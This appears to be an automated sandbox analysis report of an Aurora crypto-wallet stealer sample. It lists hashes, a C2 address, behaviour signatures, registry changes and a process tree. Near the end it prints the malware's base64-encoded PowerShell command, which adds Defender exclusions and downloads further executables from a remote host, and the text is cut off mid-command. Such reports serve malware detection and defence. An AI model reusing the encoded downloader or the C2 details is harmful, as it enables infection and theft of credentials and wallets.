aurora | 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e

Analysis

max time kernel
298s
max time network
250s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
22-02-2023 07:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe
Size

626KB
MD5

47b01695ff80b03ae518b333163da42c
SHA1

aa95d6c08ae9201828da23593e42df4a2e39ce82
SHA256

474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e
SHA512

886a285e76a7d41e14bb1cfef3a464dc47e4b665bfd6905f26961253fd5f4eee0a6fed01afd464d603c8d17f6d09edc475e2fdd4da79178c6be0f54dc5bad466
SSDEEP

6144:fMEN1L7wFSXZX4KipZx7fuwkBzvGwxAOo8jRfAAfc:f9N1LkFSJX45p3Uhq8jRAAE

Score

10^/10

aurora evasion spyware stealer

Malware Config

Extracted

Family

aurora

107.182.129.73:8081

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

SmartDefRun.exepowershell.EXE

description	pid	process	target process
PID 1248 created 1320	1248	SmartDefRun.exe	Explorer.EXE
PID 1248 created 1320	1248	SmartDefRun.exe	Explorer.EXE
PID 1248 created 1320	1248	SmartDefRun.exe	Explorer.EXE
PID 284 created 416	284	powershell.EXE	winlogon.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1456 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 5 IoCs

Processes:

new2.exeC4Loader.exeSmartDefRun.exeSysApp.exefodhelper.exe

pid process

1624 new2.exe
1824 C4Loader.exe
1248 SmartDefRun.exe
872 SysApp.exe
1880 fodhelper.exe
Loads dropped DLL 7 IoCs

Processes:

powershell.exe

pid process

1456 powershell.exe
1456 powershell.exe
1456 powershell.exe
1456 powershell.exe
1456 powershell.exe
1456 powershell.exe
1456 powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

flow	pid	process
4	1456	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

pid	process
1624	new2.exe
1824	C4Loader.exe
1248	SmartDefRun.exe
872	SysApp.exe
1880	fodhelper.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exeSmartDefRun.exepowershell.EXE

description	pid	process	target process
PID 1136 set thread context of 1748	1136	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe	vbc.exe
PID 1248 set thread context of 980	1248	SmartDefRun.exe	dialer.exe
PID 284 set thread context of 976	284	powershell.EXE	dllhost.exe

Drops file in Program Files directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1420 sc.exe
564 sc.exe
624 sc.exe
1168 sc.exe
1984 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1696 1136 WerFault.exe 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1692 schtasks.exe
912 schtasks.exe
2220 schtasks.exe

description	ioc	process
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe

pid	process
1420	sc.exe
564	sc.exe
624	sc.exe
1168	sc.exe
1984	sc.exe

pid	pid_target	process	target process
1696	1136	WerFault.exe	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe

pid	process
1692	schtasks.exe
912	schtasks.exe
2220	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 43 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90f422fe9746d901	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{17444DC1-B28B-11ED-88B7-F221FC82CB7E} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007837404bb2ac374381d657b4bfd4f9e2000000000200000000001066000000010000200000001c711c8447e2f36ccf15c1e3b50eceb5603a163074bc00c23d199a8731adac20000000000e80000000020000200000008f2218c6c6a0768dbd313df233fa23661d351aaf33a743f79d82886ebc1f5b15900000003c9c506390d5e166b07303d1590250642bcb273d3c61d98e3a9d5964db1c101f065adf17a280a10e345c487e25c41650ed4f0b47399480f6677f8f4c7fe5c66c25cb717e6ed3dcec95f048ff8c565ef4de4b526d3165ab67d716ce4a6aacfa16562ffea3a22785051795e3fcb33f16f7ab6bef6704170f0984f51129248191e3a8115c6b344df1c2f1c567b95fbd3efb400000008ed6f1116144c49139960018d9f915f2e7c4ff02f5d05972cdb1cf254d276a252ee6d7d645d15b87ade77fc5a8a7e8eb78e8bf734e787d2d0f01381265635f9d	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007837404bb2ac374381d657b4bfd4f9e2000000000200000000001066000000010000200000001c56c0051a29bf69bd72d6125320fcb7e5c8c65470c9fb23ec7aa373ff4e2ad0000000000e8000000002000020000000c4991d88f525540de9d18a5bce30e749d3f06515da825f84804be10503a917ae200000006354dfd32ce4de1003178597365c0193e2985004fda6ed1f7191db75b12b3f3a400000002624b81a8b19230753084450951afbd84e97b4776fe35762f540678009902211b69973f82796cf5d13e0557b0110349ad4f37c6a17ea010552ec652ce4772655	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "383819573"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 6090a7d69746d901	powershell.EXE

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

powershell.exeSysApp.exeSmartDefRun.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exedllhost.exefodhelper.exe

pid	process
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
872	SysApp.exe
872	SysApp.exe
872	SysApp.exe
872	SysApp.exe
872	SysApp.exe
1248	SmartDefRun.exe
1248	SmartDefRun.exe
1236	powershell.exe
1248	SmartDefRun.exe
1248	SmartDefRun.exe
1248	SmartDefRun.exe
1248	SmartDefRun.exe
1248	SmartDefRun.exe
1248	SmartDefRun.exe
284	powershell.EXE
1512	powershell.EXE
540	powershell.exe
284	powershell.EXE
976	dllhost.exe
976	dllhost.exe
976	dllhost.exe
976	dllhost.exe
1880	fodhelper.exe
1880	fodhelper.exe
1880	fodhelper.exe
1880	fodhelper.exe
1880	fodhelper.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exewmic.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeIncreaseQuotaPrivilege	744	wmic.exe
Token: SeSecurityPrivilege	744	wmic.exe
Token: SeTakeOwnershipPrivilege	744	wmic.exe
Token: SeLoadDriverPrivilege	744	wmic.exe
Token: SeSystemProfilePrivilege	744	wmic.exe
Token: SeSystemtimePrivilege	744	wmic.exe
Token: SeProfSingleProcessPrivilege	744	wmic.exe
Token: SeIncBasePriorityPrivilege	744	wmic.exe
Token: SeCreatePagefilePrivilege	744	wmic.exe
Token: SeBackupPrivilege	744	wmic.exe
Token: SeRestorePrivilege	744	wmic.exe
Token: SeShutdownPrivilege	744	wmic.exe
Token: SeDebugPrivilege	744	wmic.exe
Token: SeSystemEnvironmentPrivilege	744	wmic.exe
Token: SeRemoteShutdownPrivilege	744	wmic.exe
Token: SeUndockPrivilege	744	wmic.exe
Token: SeManageVolumePrivilege	744	wmic.exe
Token: 33	744	wmic.exe
Token: 34	744	wmic.exe
Token: 35	744	wmic.exe
Token: SeIncreaseQuotaPrivilege	744	wmic.exe
Token: SeSecurityPrivilege	744	wmic.exe
Token: SeTakeOwnershipPrivilege	744	wmic.exe
Token: SeLoadDriverPrivilege	744	wmic.exe
Token: SeSystemProfilePrivilege	744	wmic.exe
Token: SeSystemtimePrivilege	744	wmic.exe
Token: SeProfSingleProcessPrivilege	744	wmic.exe
Token: SeIncBasePriorityPrivilege	744	wmic.exe
Token: SeCreatePagefilePrivilege	744	wmic.exe
Token: SeBackupPrivilege	744	wmic.exe
Token: SeRestorePrivilege	744	wmic.exe
Token: SeShutdownPrivilege	744	wmic.exe
Token: SeDebugPrivilege	744	wmic.exe
Token: SeSystemEnvironmentPrivilege	744	wmic.exe
Token: SeRemoteShutdownPrivilege	744	wmic.exe
Token: SeUndockPrivilege	744	wmic.exe
Token: SeManageVolumePrivilege	744	wmic.exe
Token: 33	744	wmic.exe
Token: 34	744	wmic.exe
Token: 35	744	wmic.exe
Token: SeIncreaseQuotaPrivilege	1568	WMIC.exe
Token: SeSecurityPrivilege	1568	WMIC.exe
Token: SeTakeOwnershipPrivilege	1568	WMIC.exe
Token: SeLoadDriverPrivilege	1568	WMIC.exe
Token: SeSystemProfilePrivilege	1568	WMIC.exe
Token: SeSystemtimePrivilege	1568	WMIC.exe
Token: SeProfSingleProcessPrivilege	1568	WMIC.exe
Token: SeIncBasePriorityPrivilege	1568	WMIC.exe
Token: SeCreatePagefilePrivilege	1568	WMIC.exe
Token: SeBackupPrivilege	1568	WMIC.exe
Token: SeRestorePrivilege	1568	WMIC.exe
Token: SeShutdownPrivilege	1568	WMIC.exe
Token: SeDebugPrivilege	1568	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1568	WMIC.exe
Token: SeRemoteShutdownPrivilege	1568	WMIC.exe
Token: SeUndockPrivilege	1568	WMIC.exe
Token: SeManageVolumePrivilege	1568	WMIC.exe
Token: 33	1568	WMIC.exe
Token: 34	1568	WMIC.exe
Token: 35	1568	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1568	WMIC.exe
Token: SeSecurityPrivilege	1568	WMIC.exe
Token: SeTakeOwnershipPrivilege	1568	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

1964 iexplore.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1964 iexplore.exe
1964 iexplore.exe
832 IEXPLORE.EXE
832 IEXPLORE.EXE
832 IEXPLORE.EXE
832 IEXPLORE.EXE
832 IEXPLORE.EXE

pid	process
1964	iexplore.exe

pid	process
1964	iexplore.exe
1964	iexplore.exe
832	IEXPLORE.EXE
832	IEXPLORE.EXE
832	IEXPLORE.EXE
832	IEXPLORE.EXE
832	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exevbc.exepowershell.exenew2.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1136 wrote to memory of 1748	1136	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe	vbc.exe
PID 1136 wrote to memory of 1748	1136	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe	vbc.exe
PID 1136 wrote to memory of 1748	1136	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe	vbc.exe
PID 1136 wrote to memory of 1748	1136	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe	vbc.exe
PID 1136 wrote to memory of 1748	1136	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe	vbc.exe
PID 1136 wrote to memory of 1748	1136	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe	vbc.exe
PID 1136 wrote to memory of 1696	1136	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe	WerFault.exe
PID 1136 wrote to memory of 1696	1136	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe	WerFault.exe
PID 1136 wrote to memory of 1696	1136	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe	WerFault.exe
PID 1136 wrote to memory of 1696	1136	474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe	WerFault.exe
PID 1748 wrote to memory of 1456	1748	vbc.exe	powershell.exe
PID 1748 wrote to memory of 1456	1748	vbc.exe	powershell.exe
PID 1748 wrote to memory of 1456	1748	vbc.exe	powershell.exe
PID 1748 wrote to memory of 1456	1748	vbc.exe	powershell.exe
PID 1456 wrote to memory of 1624	1456	powershell.exe	new2.exe
PID 1456 wrote to memory of 1624	1456	powershell.exe	new2.exe
PID 1456 wrote to memory of 1624	1456	powershell.exe	new2.exe
PID 1456 wrote to memory of 1624	1456	powershell.exe	new2.exe
PID 1456 wrote to memory of 1824	1456	powershell.exe	C4Loader.exe
PID 1456 wrote to memory of 1824	1456	powershell.exe	C4Loader.exe
PID 1456 wrote to memory of 1824	1456	powershell.exe	C4Loader.exe
PID 1456 wrote to memory of 1824	1456	powershell.exe	C4Loader.exe
PID 1456 wrote to memory of 1248	1456	powershell.exe	SmartDefRun.exe
PID 1456 wrote to memory of 1248	1456	powershell.exe	SmartDefRun.exe
PID 1456 wrote to memory of 1248	1456	powershell.exe	SmartDefRun.exe
PID 1456 wrote to memory of 1248	1456	powershell.exe	SmartDefRun.exe
PID 1456 wrote to memory of 872	1456	powershell.exe	SysApp.exe
PID 1456 wrote to memory of 872	1456	powershell.exe	SysApp.exe
PID 1456 wrote to memory of 872	1456	powershell.exe	SysApp.exe
PID 1456 wrote to memory of 872	1456	powershell.exe	SysApp.exe
PID 1624 wrote to memory of 744	1624	new2.exe	wmic.exe
PID 1624 wrote to memory of 744	1624	new2.exe	wmic.exe
PID 1624 wrote to memory of 744	1624	new2.exe	wmic.exe
PID 1624 wrote to memory of 868	1624	new2.exe	cmd.exe
PID 1624 wrote to memory of 868	1624	new2.exe	cmd.exe
PID 1624 wrote to memory of 868	1624	new2.exe	cmd.exe
PID 868 wrote to memory of 1568	868	cmd.exe	WMIC.exe
PID 868 wrote to memory of 1568	868	cmd.exe	WMIC.exe
PID 868 wrote to memory of 1568	868	cmd.exe	WMIC.exe
PID 1624 wrote to memory of 980	1624	new2.exe	cmd.exe
PID 1624 wrote to memory of 980	1624	new2.exe	cmd.exe
PID 1624 wrote to memory of 980	1624	new2.exe	cmd.exe
PID 980 wrote to memory of 2004	980	cmd.exe	WMIC.exe
PID 980 wrote to memory of 2004	980	cmd.exe	WMIC.exe
PID 980 wrote to memory of 2004	980	cmd.exe	WMIC.exe
PID 1892 wrote to memory of 1420	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 1420	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 1420	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 564	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 564	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 564	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 624	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 624	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 624	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 1168	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 1168	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 1168	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 1984	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 1984	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 1984	1892	cmd.exe	sc.exe
PID 1892 wrote to memory of 1588	1892	cmd.exe	reg.exe
PID 1892 wrote to memory of 1588	1892	cmd.exe	reg.exe
PID 1892 wrote to memory of 1588	1892	cmd.exe	reg.exe
PID 1892 wrote to memory of 744	1892	cmd.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a5e65a51-85c2-481c-9305-a48f9515cf84}
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:976

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1320

C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe
"C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB5AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB0AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBlAGsAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGwAbQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBoAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdAB2AGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBiAGMAagAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGgAbwBwAHQAbwAuAG8AcgBnAC8AdwBvAHcALwAxAC8AMgAvADMALwA0AC8ANQAvADYALwA3AC8AQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwAsACAAPAAjAHMAbQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB5AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABqAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHIAegB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAdAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGwAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGQAawAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQBy